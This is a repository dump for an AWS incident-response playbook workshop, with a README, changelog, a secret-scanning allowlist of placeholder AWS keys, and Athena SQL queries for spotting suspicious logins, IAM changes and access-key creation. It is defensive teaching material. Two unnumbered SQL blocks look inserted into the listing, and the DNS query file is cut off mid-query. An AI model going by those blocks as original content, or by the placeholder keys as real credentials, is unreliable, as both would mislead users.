├── .gitallowed
├── .gitignore
├── CHANGELOG.md
├── CODE_OF_CONDUCT.md
├── CONTRIBUTING.md
├── LICENSE
├── NOTICE
├── README.md
├── analytics
│   ├── cloudtrail
│   │   └── cloudtrail_demo_queries.sql
│   ├── dns
│   │   └── dns_demo_queries.sql
│   └── vpcflow
│       └── vpcflow_demo_queries.sql
├── app.py
├── cdk.json
├── cdk.out
│   └── WorkshopStack.yaml
├── package.json
├── playbooks
│   ├── README.md
│   ├── credential_exposure
│   │   ├── IAM_credential_exposure.md
│   │   ├── containment
│   │   │   ├── iam_containment_policy.json
│   │   │   └── s3_bucket_containment_policy.json
│   │   ├── evidence
│   │   │   └── stuff
│   │   ├── images
│   │   │   ├── aws_caf.png
│   │   │   └── nist_life_cycle.png
│   │   └── simulation
│   │       ├── simulate_credential_exposure_activity.sh
│   │       └── undo_simulate_credential_exposure_activity.sh
│   ├── crypto_mining
│   │   ├── EC2_crypto_mining.md
│   │   ├── containment
│   │   │   └── iam_containment_policy.json
│   │   ├── images
│   │   │   ├── aws_caf.png
│   │   │   └── nist_life_cycle.png
│   │   ├── response_scripts
│   │   │   └── retrieve_guardduty_findings.sh
│   │   └── simulation
│   │       ├── simulate_crypto_mining_activity.sh
│   │       ├── undo_simulate_crypto_mining_activity.sh
│   │       └── userdata.sh
│   └── template
│       ├── images
│       │   ├── aws_caf.png
│       │   └── nist_life_cycle.png
│       └── threat_name.md
├── readme-images
│   └── diagram.png
├── remove_cdk_metadata.sh
├── requirements.txt
├── setup.py
└── workshop_stack.py

/.gitallowed:
--------------------------------------------------------------------------------
1 | 777777777777
2 | AIDACKCEVSQ6C2EXAMPLE
3 | AKIAIOSFODNN7EXAMPLE
4 | AKIAI44QH8DHBEXAMPLE
5 | ANPAJ2UCCR6DPCEXAMPLE
6 | ANPAJ4AE5446DAEXAMPLE
7 | APKAEIBAERJR2EXAMPLE
8 | APKAEIVFHP46CEXAMPLE
9 | wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
10 | je7MtGbClwBF/2Zp9Utk/h3yCo8nvbEXAMPLEKEY
11 | 1234567890abcdef0
12 | abcdef01234567890
13 | 021345abcdef6789
14 | i-021345abcdef678[a-z]
15 | .git/*
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | cdk.context.json
2 | *.swp
3 | package-lock.json
4 | __pycache__
5 | .pytest_cache
6 | .env
7 | .venv
8 | *.egg-info
9 | .idea
10 | .idea/*
11 | **/.DS_Store
12 | cdk.out/*.out
13 | cdk.out/*.json
14 | .vscode
15 | node_modules
--------------------------------------------------------------------------------
/CHANGELOG.md:
--------------------------------------------------------------------------------
1 | # Version [1.3] - 2024-02-17
2 | 
3 | ## Changes
4 | 
5 | ### Workshop Stack
6 | * Upgraded to AWS CDK version 2.128
7 | * Created CfnParameter for Athena Engine Version
8 | * Set Athena Engine Version as 3
9 | 
10 | ### Playbooks
11 | * Not applicable
12 | 
13 | # Version [1.2] - 2023-08-14
14 | 
15 | ## Changes
16 | 
17 | ### Workshop Stack
18 | * Updated base role from `TeamRole` to `WSParticipantRole` to be used in AWS Workshop Studio events
19 | * Upgraded to AWS CDK version `2.91.0`
20 | 
21 | ### Playbooks
22 | * Not applicable
23 | 
24 | # Version [1.1] - 2023-07-07
25 | 
26 | ## Changes
27 | 
28 | ### Workshop Stack
29 | * Upgraded to AWS CDK version `2.87.0`
30 | * EC2 instance type changed to `t3.small`
31 | * Removed CDK metadata from cdk.out/WorkshopStack.yaml
32 | * Added script to remove CDK metadata from the CloudFormation template, allowing direct deployment to CloudFormation without using AWS CDK
33 | 
34 | ### Playbooks
35 | * Not applicable
36 | 
37 | # Version [1.0] - 2023-05-25
38 | 
39 | ## Changes
40 | 
41 | ### Workshop Stack
42 | * Upgraded to AWS CDK v2
43 | * Updated AWS CDK constructs to new version
44 | * EC2 instance connect via AWS Systems Manager
45 | * EC2 instance opened to the internet for simulations
46 | * S3 Buckets using new defaults (no ACL, no Public Access)
47 | * Added [permissions](https://docs.aws.amazon.com/guardduty/latest/ug/security_iam_id-based-policy-examples.html#guardduty_enable-permissions) to enable GuardDuty to the Security Deploy role
48 | 
49 | ### Playbooks
50 | * Not applicable
51 | 
52 | # Version [0.9] - 2021-11-24
53 | 
54 | ## Changes
55 | 
56 | ### Workshop Stack
57 | * Added CloudShell entitlements to all roles
58 | 
59 | ### Playbooks
60 | * Not applicable
61 | 
62 | # Version [0.8] - 2021-11-19
63 | 
64 | ## Changes
65 | 
66 | ### Workshop Stack
67 | * Not applicable
68 | 
69 | ### Playbooks
70 | * Added scripts to the simulation folder that remove the resources created by the simulations
71 | 
72 | # Version [0.7] - 2021-11-15
73 | 
74 | ## Changes
75 | 
76 | ### Workshop Stack
77 | * Not applicable
78 | 
79 | ### Playbooks
80 | * Comments added to simulation scripts
81 | 
82 | # Version [0.6] - 2021-11-09
83 | 
84 | ## Changes
85 | 
86 | ### Workshop Stack
87 | * CloudFormation parameter changed to accept IAM User or Role as the principal to assume the Security role
88 | 
89 | ### Playbooks
90 | * Fixed typo in `aws s3 rb` command results
91 | 
92 | # Version [0.5] - 2021-11-01
93 | 
94 | ## Changes
95 | 
96 | ### Workshop Stack
97 | * Added ReadOnlyAccess permissions to SecurityDeployRole
98 | 
99 | ### Playbooks
100 | * Added IAM entitlements required to run playbook
101 | 
102 | 
103 | # Version [0.4] - 2021-10-27
104 | 
105 | ## Changes
106 | 
107 | ### Workshop Stack
108 | * Added CloudShell and CloudFormation permissions to SecurityDeployRole
109 | 
110 | 
111 | # Version [0.3] - 2021-10-13
112 | 
113 | ## Changes
114 | 
115 | ### CoreStack
116 | * Removed GuardDuty
117 | * Removed GuardDuty IAM Policy statement
118 | 
119 | # Version [0.2] - 2021-08-05
120 | 
121 | ## Changes
122 | 
123 | ### CoreStack
124 | * Policy change for Deploy Role
125 | * Removed unnecessary code comments
126 | * Playbook grammar and syntax fixes
127 | 
128 | # Version [0.1] - 2021-07-22
129 | 
130 | ## Features added
131 | 
132 | ### CoreStack
133 | * CloudTrail logging to S3 bucket
134 | * VPC Flow logging to S3 bucket
135 | * DNS logging to S3 bucket
136 | * GuardDuty enabled
137 | * Athena Workgroup
138 | * Glue database and tables for all log types
139 | * IAM Role for Athena administration
140 | * IAM Role for security analyst to use Athena
141 | 
142 | ### SimulationStack
143 | * IAM User Access Keys for crypto mining playbook simulation
144 | * IAM User Access Keys for exposed credential playbook simulation
145 | 
146 | ### Playbooks
147 | * Credential exposure
148 | * Crypto mining
149 | * Template
150 | 
--------------------------------------------------------------------------------
/CODE_OF_CONDUCT.md:
--------------------------------------------------------------------------------
1 | ## Code of Conduct
2 | This project has adopted the [Amazon Open Source Code of Conduct](https://aws.github.io/code-of-conduct).
3 | For more information see the [Code of Conduct FAQ](https://aws.github.io/code-of-conduct-faq) or contact
4 | opensource-codeofconduct@amazon.com with any additional questions or comments.
5 | 
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # Contributing Guidelines
2 | 
3 | Thank you for your interest in contributing to our project.
Whether it's a bug report, new feature, correction, or additional 4 | documentation, we greatly value feedback and contributions from our community. 5 | 6 | Please read through this document before submitting any issues to ensure we have all the necessary 7 | information to effectively respond to your bug report or contribution. 8 | 9 | 10 | ## Reporting Bugs/Feature Requests 11 | 12 | We welcome you to use the GitHub issue tracker to report bugs or suggest features. 13 | 14 | When filing an issue, please check existing open, or recently closed, issues to make sure somebody else hasn't already 15 | reported the issue. Please try to include as much information as you can. Details like these are incredibly useful: 16 | 17 | * A reproducible test case or series of steps 18 | * The version of our code you have used 19 | * Any modifications you've made relevant to the bug 20 | * Anything unusual about your environment or deployment 21 | 22 | 23 | ## Code of Conduct 24 | This project has adopted the [Amazon Open Source Code of Conduct](https://aws.github.io/code-of-conduct). 25 | For more information see the [Code of Conduct FAQ](https://aws.github.io/code-of-conduct-faq) or contact 26 | opensource-codeofconduct@amazon.com with any additional questions or comments. 27 | 28 | 29 | ## Security issue notifications 30 | If you discover a potential security issue in this project we ask that you notify AWS/Amazon Security via our [vulnerability reporting page](http://aws.amazon.com/security/vulnerability-reporting/). Please do **not** create a public github issue. 31 | 32 | 33 | ## Licensing 34 | 35 | See the [LICENSE](LICENSE) file for our project's licensing. We will ask you to confirm the licensing of your contribution. 36 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of this 4 | software and associated documentation files (the "Software"), to deal in the Software 5 | without restriction, including without limitation the rights to use, copy, modify, 6 | merge, publish, distribute, sublicense, and/or sell copies of the Software, and to 7 | permit persons to whom the Software is furnished to do so. 8 | 9 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, 10 | INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A 11 | PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT 12 | HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION 13 | OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE 14 | SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. -------------------------------------------------------------------------------- /NOTICE: -------------------------------------------------------------------------------- 1 | Building Incident Response Playbooks in AWS 2 | Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. 
3 | 
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Building Incident Response Playbooks for AWS
2 | 
3 | This project is part of the workshop [Building Incident Response Playbooks for AWS](https://aws-incident-response-playbooks.workshop.aws). Follow the workshop directions for optimal use of this repository's contents.
4 | 
5 | ## DO NOT DEPLOY THE CODE FROM THIS REPOSITORY IN AN EXISTING AWS ACCOUNT YOU CURRENTLY USE. CREATE A NEW SANDBOX ACCOUNT FOR THE PURPOSE OF THIS WORKSHOP.
6 | 
7 | ## Sandbox environment
8 | * This is a sandbox environment for learning purposes only. You will take the learnings from building a playbook in this controlled environment and adapt them to your own environment.
9 | * GuardDuty, CloudTrail, VPC Flow, and DNS logs are the fundamental pillars for threat detection and incident response in AWS. Focus on learning how to interpret them based on the activity generated.
10 | 
11 | ## Solving customer challenges around incident response in AWS
12 | * This project builds an environment in an AWS account that facilitates the development of playbooks, enhancing customers' capability to respond to security events.
13 | * [Amazon Athena](https://aws.amazon.com/athena/) provides analytical capabilities with pre-configured tables for querying [AWS CloudTrail](https://aws.amazon.com/cloudtrail/) logs, [Amazon VPC Flow logs](https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs.html), and [Amazon Route 53 VPC DNS logs](https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/resolver-query-logs.html) centralized in an Amazon S3 bucket.
14 | * Includes two (2) sample playbooks addressing the `IAM credential exposure` and `EC2 crypto mining` threats, plus a `template` for you to develop additional scenarios.
15 | * Includes Linux bash scripts to simulate the threats and practice the response laid out by the sample playbooks. Create your own scripts in Linux bash or other languages to support the development and testing of your own security event scenarios.
16 | 
17 | * * *
18 | 
19 | ## Architecture Overview
20 | 
21 | An AWS CDK application creates one stack named `WorkshopStack` containing the minimum environment required to support the development of Incident Response Playbooks. The components are listed in the next section.
22 | 
23 | 
24 | ### WorkshopStack components:
25 | * Amazon S3 Bucket centralizing all required log sources
26 | * Amazon S3 Bucket for Athena query results
27 | * A VPC with public and private subnets, internet gateway, NAT gateway, and one EC2 instance
28 | * CloudTrail trail logging management and data events, streaming to the S3 bucket
29 | * VPC DNS logs enabled for the VPC, streaming to the S3 bucket
30 | * VPC Flow logs enabled for the VPC, streaming to the S3 bucket
31 | * Athena Workgroup
32 | * Glue database and tables
33 | * Security analyst IAM Role to run Athena queries
34 | * Athena administrator IAM Role to configure Athena and Glue
35 | * Security break glass IAM Role for containment, eradication, and recovery
36 | * Security deploy IAM Role for CloudFormation deployment of the SimulationStack
37 | * IAM User Access Key for the EC2 crypto mining simulation
38 | * IAM User Access Key for the IAM credential exposure simulation
39 | * Amazon GuardDuty for alerting (enabled manually)
40 | 
41 | ![Image](readme-images/diagram.png)
42 | 
43 | * * *
44 | 
45 | ## Deployment
46 | * Clone this repository and choose between [AWS CDK](https://docs.aws.amazon.com/cdk/latest/guide/home.html) or [AWS CloudFormation](https://aws.amazon.com/cloudformation/) for deployment of the stacks.
47 | 
48 | ### CloudFormation
49 | Preferred deployment method for those with little coding and AWS experience.
50 | * Log in to your AWS account
51 | * Go to the [AWS CloudFormation console](https://console.aws.amazon.com/cloudformation)
52 | * Create a stack using cdk.out/WorkshopStack.yaml from the cloned repository
53 | 
54 | Refer to this page for getting started with [AWS CloudFormation](https://aws.amazon.com/cloudformation/getting-started/).
55 | 
56 | ### AWS CDK
57 | We recommend this method for those with solid coding and AWS experience.
58 | * Install `node v18`
59 |   * check the version by running `node --version`
60 | * Install `Python 3.10`
61 |   * check the version by running `python --version`
62 | * Configure a Python virtual environment
63 |   * change directory to the root of the cloned repository
64 |   * run `python3 -m venv .venv`
65 |   * run `source .venv/bin/activate`
66 |   * run `python -m pip install -r requirements.txt`
67 | * Install node modules
68 |   * run `npm i`
69 | * Install [AWS CLI v2](https://docs.aws.amazon.com/cli/latest/userguide/install-cliv2.html)
70 | * Create IAM credentials with permission to deploy AWS resources using CloudFormation
71 | * Configure the `AWS CLI` with the IAM credentials
72 |   * run `aws configure`
73 |   * verify by running `aws sts get-caller-identity`
74 | * Deploy the AWS CDK app
75 |   * run `cdk bootstrap`
76 |   * run `cdk synth`
77 |   * run `cdk deploy`
78 | 
79 | Refer to this page for getting started with [AWS CDK](https://docs.aws.amazon.com/cdk/latest/guide/getting_started.html).
80 | 
81 | * * *
82 | 
83 | ## Cost
84 | 
85 | Consider the costs involved in deploying this solution beyond what is included with the [AWS Free Tier](https://aws.amazon.com/free/), if applicable:
86 | 
87 | * Amazon Athena: https://aws.amazon.com/athena/pricing/
88 | * Amazon S3: https://aws.amazon.com/s3/pricing/
89 | * Amazon EC2: https://aws.amazon.com/ec2/pricing
90 | * AWS CloudTrail: https://aws.amazon.com/cloudtrail/pricing/
91 | * AWS Glue: https://aws.amazon.com/glue/pricing/
92 | * Amazon GuardDuty (enabled manually): https://docs.aws.amazon.com/guardduty/latest/ug/monitoring_costs.html
93 | * * *
94 | 
95 | 
96 | ## Related Resources
97 | 
98 | ### AWS resources
99 | * [AWS Customer Playbook Framework](https://github.com/aws-samples/aws-customer-playbook-framework)
100 | * [AWS re:Invent 2020: Building your cloud incident response program](https://www.youtube.com/watch?v=MW7kcXL6OVo)
101 | * [AWS Incident Response Playbook Samples (process only)](https://github.com/aws-samples/aws-incident-response-playbooks)
102 | * [AWS Cloud Adoption Framework Security Perspective](https://d0.awsstatic.com/whitepapers/AWS_CAF_Security_Perspective.pdf)
103 | * [AWS Well-Architected labs - Security](https://wellarchitectedlabs.com/security/)
104 | * [AWS Security Analytics Bootstrap](https://github.com/awslabs/aws-security-analytics-bootstrap)
105 | * [AWS API Guides and Documentation](https://docs.aws.amazon.com/index.html)
106 | * [CloudTrail User Guide](https://docs.aws.amazon.com/awscloudtrail/latest/userguide/cloudtrail-user-guide.html)
107 | * [Amazon VPC Flow Logs](https://docs.aws.amazon.com/vpc/latest/userguide/flow-logs.html)
108 | * [Amazon Route 53 VPC DNS resolver logs](https://docs.aws.amazon.com/Route53/latest/DeveloperGuide/resolver.html)
109 | 
110 | ### Third-party resources
111 | * [NIST Computer Security Incident Handling Guide (Special Publication 800-61 Revision 2)](https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf)
112 | 
113 | * * *
--------------------------------------------------------------------------------
/analytics/cloudtrail/cloudtrail_demo_queries.sql:
--------------------------------------------------------------------------------
1 | /*
2 | Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
3 | SPDX-License-Identifier: MIT-0
4 | */
5 | 
6 | -- PREVIEW TABLE
7 | -- preview first 10 rows with all fields, quick way to verify everything is set up correctly
8 | 
9 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"
10 | LIMIT 10;
11 | 
12 | -- PARTITION TESTS
13 | /* NOTE: if there are no constraints on a partition (account, region, or date) then by default ALL data will be scanned;
14 | this could lead to a costly query, so always consider using at least one partition constraint.
15 | 
16 | Note that this is the case even if you have other constraints in a query (e.g. sourceipaddress = '192.0.2.1'),
17 | only constraints using partition fields (date_partition, region_partition, account_partition)
18 | will limit the amount of data scanned.
19 | */
20 | 
21 | -- preview first 10 rows with all fields, limited to a single account
22 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"
23 | WHERE account_partition = '111122223333'
24 | LIMIT 10;
25 | 
26 | -- preview first 10 rows with all fields, limited to multiple accounts
27 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"
28 | WHERE account_partition in ('111122223333','444455556666','123456789012')
29 | LIMIT 10;
30 | 
31 | -- preview first 10 rows with all fields, limited to a single region
32 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"
33 | WHERE region_partition = 'us-east-1'
34 | LIMIT 10;
35 | 
36 | -- preview first 10 rows with all fields, limited to multiple regions
37 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"
38 | WHERE region_partition in ('us-east-1','us-east-2','us-west-2')
39 | LIMIT 10;
40 | 
41 | -- NOTE: date_partition format is 'YYYY/MM/DD' as a string
42 | -- preview first 10 rows with all fields, limited to a certain date range
43 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"
44 | WHERE date_partition >= '2021/07/01'
45 | AND date_partition <= '2021/07/31'
46 | LIMIT 10;
47 | 
48 | -- preview first 10 rows with all fields, limited to the past 30 days (relative)
49 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"
50 | WHERE date_partition >= date_format(date_add('day',-30,current_timestamp), '%Y/%m/%d')
51 | LIMIT 10;
52 | 
53 | -- preview first 10 rows with all fields, limited by a combination of partition constraints
54 | -- NOTE: narrowing the scope of the query as much as possible will improve performance and minimize cost
55 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"
56 | WHERE date_partition >= '2021/07/01'
57 | AND date_partition <= '2021/07/31'
58 | AND account_partition = '111122223333'
59 | AND region_partition in ('us-east-1','us-east-2','us-west-2')
60 | LIMIT 10;
61 | 
62 | -- ANALYSIS EXAMPLES
63 | -- NOTE: default partition constraints have been provided for each query,
64 | -- be sure to add the appropriate partition constraints to the WHERE clause as shown above
65 | /*
66 | DEFAULT partition constraints:
67 | WHERE date_partition >= '2021/07/01'
68 | AND date_partition <= '2021/07/31'
69 | AND account_partition = '111122223333'
70 | AND region_partition in ('us-east-1','us-east-2','us-west-2')
71 | 
72 | Be sure to modify or remove these to fit the scope of your intended analysis
73 | */
74 | 
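-- (Added example) Failed-call summary: AccessDenied and UnauthorizedOperation errors by principal,
-- a quick way to spot permission probing. A minimal sketch assuming the same table and the
-- DEFAULT partition constraints above; adjust dates, account, and regions to your scope.
SELECT useridentity.arn, eventsource, eventname, errorcode, count(*) as errorcount
FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"
WHERE errorcode in ('AccessDenied','UnauthorizedOperation')
AND date_partition >= '2021/07/01'
AND date_partition <= '2021/07/31'
AND account_partition = '111122223333'
AND region_partition in ('us-east-1','us-east-2','us-west-2')
GROUP BY useridentity.arn, eventsource, eventname, errorcode
ORDER BY errorcount DESC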
75 | -- Summary of event counts by Region (e.g. where is the most activity)
76 | SELECT region_partition, count(*) as eventcount FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"
77 | WHERE date_partition >= '2021/07/01'
78 | AND date_partition <= '2021/07/31'
79 | AND account_partition = '111122223333'
80 | AND region_partition in ('us-east-1','us-east-2','us-west-2')
81 | GROUP BY region_partition
82 | ORDER BY eventcount DESC
83 | 
84 | -- Summary of event count by Region and EventName, ordered by event count (descending) for each region
85 | -- Quick way to identify top EventNames seen in each region
86 | SELECT region_partition, eventname, count(*) as eventcount FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"
87 | WHERE date_partition >= '2021/07/01'
88 | AND date_partition <= '2021/07/31'
89 | AND account_partition = '111122223333'
90 | AND region_partition in ('us-east-1','us-east-2','us-west-2')
91 | GROUP BY region_partition, eventname
92 | ORDER BY region_partition, eventcount DESC
93 | 
94 | -- User login summary, via AssumeRole or ConsoleLogin
95 | -- includes a list of all source IPs for each user
96 | SELECT useridentity.arn, eventname, array_agg(DISTINCT(sourceipaddress) ORDER BY sourceipaddress) AS sourceips FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"
97 | WHERE useridentity.arn IS NOT NULL
98 | AND (eventname = 'AssumeRole' OR eventname = 'ConsoleLogin')
99 | AND date_partition >= '2021/07/01'
100 | AND date_partition <= '2021/07/31'
101 | AND account_partition = '111122223333'
102 | AND region_partition in ('us-east-1','us-east-2','us-west-2')
103 | GROUP BY useridentity.arn, eventname
104 | ORDER BY eventname
105 | 
106 | -- User Activity Summary
107 | -- filter high volume read-only GET/LIST/DESCRIBE calls
108 | SELECT useridentity.arn, array_agg(DISTINCT(eventname)) AS eventnames,
109 | array_agg(DISTINCT(sourceipaddress) ORDER BY sourceipaddress) AS sourceips,
110 | array_agg(DISTINCT(useragent) ORDER BY useragent) AS useragents FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"
111 | WHERE eventname <> 'AssumeRole'
112 | AND eventname NOT LIKE 'Get%'
113 | AND eventname NOT LIKE 'List%'
114 | AND eventname NOT LIKE 'Describe%'
115 | AND date_partition >= '2021/07/01'
116 | AND date_partition <= '2021/07/31'
117 | AND account_partition = '111122223333'
118 | AND region_partition in ('us-east-1','us-east-2','us-west-2')
119 | GROUP BY useridentity.arn
120 | 
121 | -- User Activity Summary, including username
122 | -- filter high volume read-only GET/LIST/DESCRIBE calls
123 | -- same as above, but will include the ARN or the username (for IAM Users) of the principal
124 | SELECT useridentity.arn, useridentity.username,
125 | array_agg(DISTINCT(eventname) ORDER BY eventname) AS eventnames,
126 | array_agg(DISTINCT(sourceipaddress) ORDER BY sourceipaddress) AS sourceips,
127 | array_agg(DISTINCT(useragent) ORDER BY useragent) AS useragents FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"
128 | WHERE eventname <> 'AssumeRole'
129 | AND eventname NOT LIKE 'Get%'
130 | AND eventname NOT LIKE 'List%'
131 | AND eventname NOT LIKE 'Describe%'
132 | AND date_partition >= '2021/07/01'
133 | AND date_partition <= '2021/07/31'
134 | AND account_partition = '111122223333'
135 | AND region_partition in ('us-east-1','us-east-2','us-west-2')
136 | GROUP BY useridentity.arn, useridentity.principalid, useridentity.username
137 | 
138 | -- IAM change summary
139 | -- * filter read-only GET/LIST/DESCRIBE
140 | -- * filter unsuccessful calls
141 | SELECT eventtime, useridentity.arn, useridentity.username, eventname, requestparameters
142 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"
143 | WHERE eventsource = 'iam.amazonaws.com'
144 | AND eventname NOT LIKE 'Get%'
145 | AND eventname NOT LIKE 'List%'
146 | AND eventname NOT LIKE 'Describe%'
147 | AND errorcode IS NULL
148 | AND date_partition >= '2021/07/01'
149 | AND date_partition <= '2021/07/31'
150 | AND account_partition = '111122223333'
151 | AND region_partition in ('us-east-1','us-east-2','us-west-2')
152 | ORDER BY account_partition, eventtime
153 | 
154 | -- Access Key creations with extract of username and keyid
155 | -- * filter unsuccessful calls
156 | SELECT eventtime, useridentity.arn, useridentity.username, eventname,
157 | JSON_EXTRACT_SCALAR(JSON_EXTRACT(responseelements, '$.accessKey'), '$.userName') AS userName,
158 | JSON_EXTRACT_SCALAR(JSON_EXTRACT(responseelements, '$.accessKey'), '$.accessKeyId') AS accessKey
159 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"
160 | WHERE eventname = 'CreateAccessKey'
161 | AND errorcode IS NULL
162 | AND date_partition >= '2021/07/01'
163 | AND date_partition <= '2021/07/31'
164 | AND account_partition = '111122223333'
165 | AND region_partition in ('us-east-1','us-east-2','us-west-2')
166 | ORDER BY account_partition, eventtime
167 | 
168 | -- Password changes with extract of username
169 | -- * filter unsuccessful calls
170 | SELECT eventtime, useridentity.arn, useridentity.username, eventname,
171 | JSON_EXTRACT_SCALAR(requestparameters, '$.userName') AS "username with password modified"
172 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"
173 | WHERE eventname IN ('UpdateLoginProfile', 'CreateLoginProfile')
174 | AND errorcode IS NULL
175 | AND date_partition >= '2021/07/01'
176 | AND date_partition <= '2021/07/31'
177 | AND account_partition = '111122223333'
178 | AND region_partition in ('us-east-1','us-east-2','us-west-2')
179 | ORDER BY account_partition, eventtime
180 | 
181 | -- Create optimized ORC columnar format table for a single account and region for the past 90 days
182 | -- NOTE: single query limit is 100 partitions, to add additional accounts, regions, or days use the following INSERT INTO method
183 | -- Reference: https://docs.aws.amazon.com/athena/latest/ug/ctas-insert-into.html
184 | CREATE TABLE "irworkshopgluedatabase"."irworkshopgluetablecloudtrail_orc"
185 | WITH (format = 'ORC', orc_compression = 'SNAPPY', partitioned_by = ARRAY['account_partition','region_partition','date_partition'] ) AS
186 | SELECT eventversion,
187 | useridentity,
188 | eventtime,
189 | eventsource,
190 | eventname,
191 | awsregion,
192 | sourceipaddress,
193 | useragent,
194 | errorcode,
195 | errormessage,
196 | requestparameters,
197 | responseelements,
198 | additionaleventdata,
199 | requestid,
200 | eventid,
201 | resources,
202 | eventtype,
203 | apiversion,
204 | readonly,
205 | recipientaccountid,
206 | serviceeventdetails,
207 | sharedeventid,
208 | vpcendpointid,
209 | account_partition,
210 | region_partition,
211 | date_partition
212 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"
213 | WHERE account_partition = '111122223333'
214 | AND region_partition = 'us-east-1'
215 | AND date_partition >= date_format(date_add('day',-90,current_timestamp), '%Y/%m/%d')
216 | 
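-- (Added example) Once created, the ORC copy can be queried in place of the raw table;
-- a minimal sketch assuming the table name used in the CTAS statement above
SELECT eventname, count(*) AS eventcount
FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail_orc"
WHERE account_partition = '111122223333'
AND region_partition = 'us-east-1'
GROUP BY eventname
ORDER BY eventcount DESC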
217 | -- Add optimized ORC columnar format table for a single account and region for the past 90 days
218 | -- NOTE: single query limit is 100 partitions, to add additional accounts, regions, or days keep using this INSERT INTO method
219 | -- Reference: https://docs.aws.amazon.com/athena/latest/ug/ctas-insert-into.html
220 | INSERT INTO "irworkshopgluedatabase"."irworkshopgluetablecloudtrail_orc"
221 | SELECT eventversion,
222 | useridentity,
223 | eventtime,
224 | eventsource,
225 | eventname,
226 | awsregion,
227 | sourceipaddress,
228 | useragent,
229 | errorcode,
230 | errormessage,
231 | requestparameters,
232 | responseelements,
233 | additionaleventdata,
234 | requestid,
235 | eventid,
236 | resources,
237 | eventtype,
238 | apiversion,
239 | readonly,
240 | recipientaccountid,
241 | serviceeventdetails,
242 | sharedeventid,
243 | vpcendpointid,
244 | account_partition,
245 | region_partition,
246 | date_partition
247 | FROM "irworkshopgluedatabase"."irworkshopgluetablecloudtrail"
248 | WHERE account_partition = '111122223333'
249 | AND region_partition = 'us-east-2'
250 | AND date_partition >= date_format(date_add('day',-90,current_timestamp), '%Y/%m/%d')
--------------------------------------------------------------------------------
/analytics/dns/dns_demo_queries.sql:
--------------------------------------------------------------------------------
1 | /*
2 | Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
3 | SPDX-License-Identifier: MIT-0
4 | */
5 | 
6 | -- PREVIEW TABLE
7 | -- preview first 10 rows with all fields, quick way to verify everything is set up correctly
8 | 
9 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetabledns"
10 | LIMIT 10;
11 | 
12 | -- PARTITION TESTS
13 | /* NOTE: if there are no constraints on a partition (account, vpc, or date) then by default ALL data will be scanned;
14 | this could lead to a costly query, so always consider using at least one partition constraint.
15 | 
16 | Note that this is the case even if you have other constraints in a query (e.g. sourceaddress = '192.0.2.1'),
17 | only constraints using partition fields (date_partition, vpc_partition, account_partition)
18 | will limit the amount of data scanned.
19 | */
20 | 
21 | -- preview first 10 rows with all fields, limited to a single account
22 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetabledns"
23 | WHERE account_partition = '111122223333'
24 | LIMIT 10;
25 | 
26 | -- preview first 10 rows with all fields, limited to multiple accounts
27 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetabledns"
28 | WHERE account_partition in ('111122223333','444455556666','123456789012')
29 | LIMIT 10;
30 | 
31 | -- preview first 10 rows with all fields, limited to a single vpc
32 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetabledns"
33 | WHERE vpc_partition = 'vpc-00000001'
34 | LIMIT 10;
35 | 
36 | -- preview first 10 rows with all fields, limited to multiple vpcs
37 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetabledns"
38 | WHERE vpc_partition in ('vpc-00000001','vpc-00000002','vpc-00000003')
39 | LIMIT 10;
40 | 
41 | -- NOTE: date_partition format is 'YYYY/MM/DD' as a string
42 | -- preview first 10 rows with all fields, limited to a certain date range
43 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetabledns"
44 | WHERE date_partition >= '2020/07/01'
45 | AND date_partition <= '2020/07/31'
46 | LIMIT 10;
47 | 
48 | -- preview first 10 rows with all fields, limited to the past 30 days (relative)
49 | SELECT * from "irworkshopgluedatabase"."irworkshopgluetabledns"
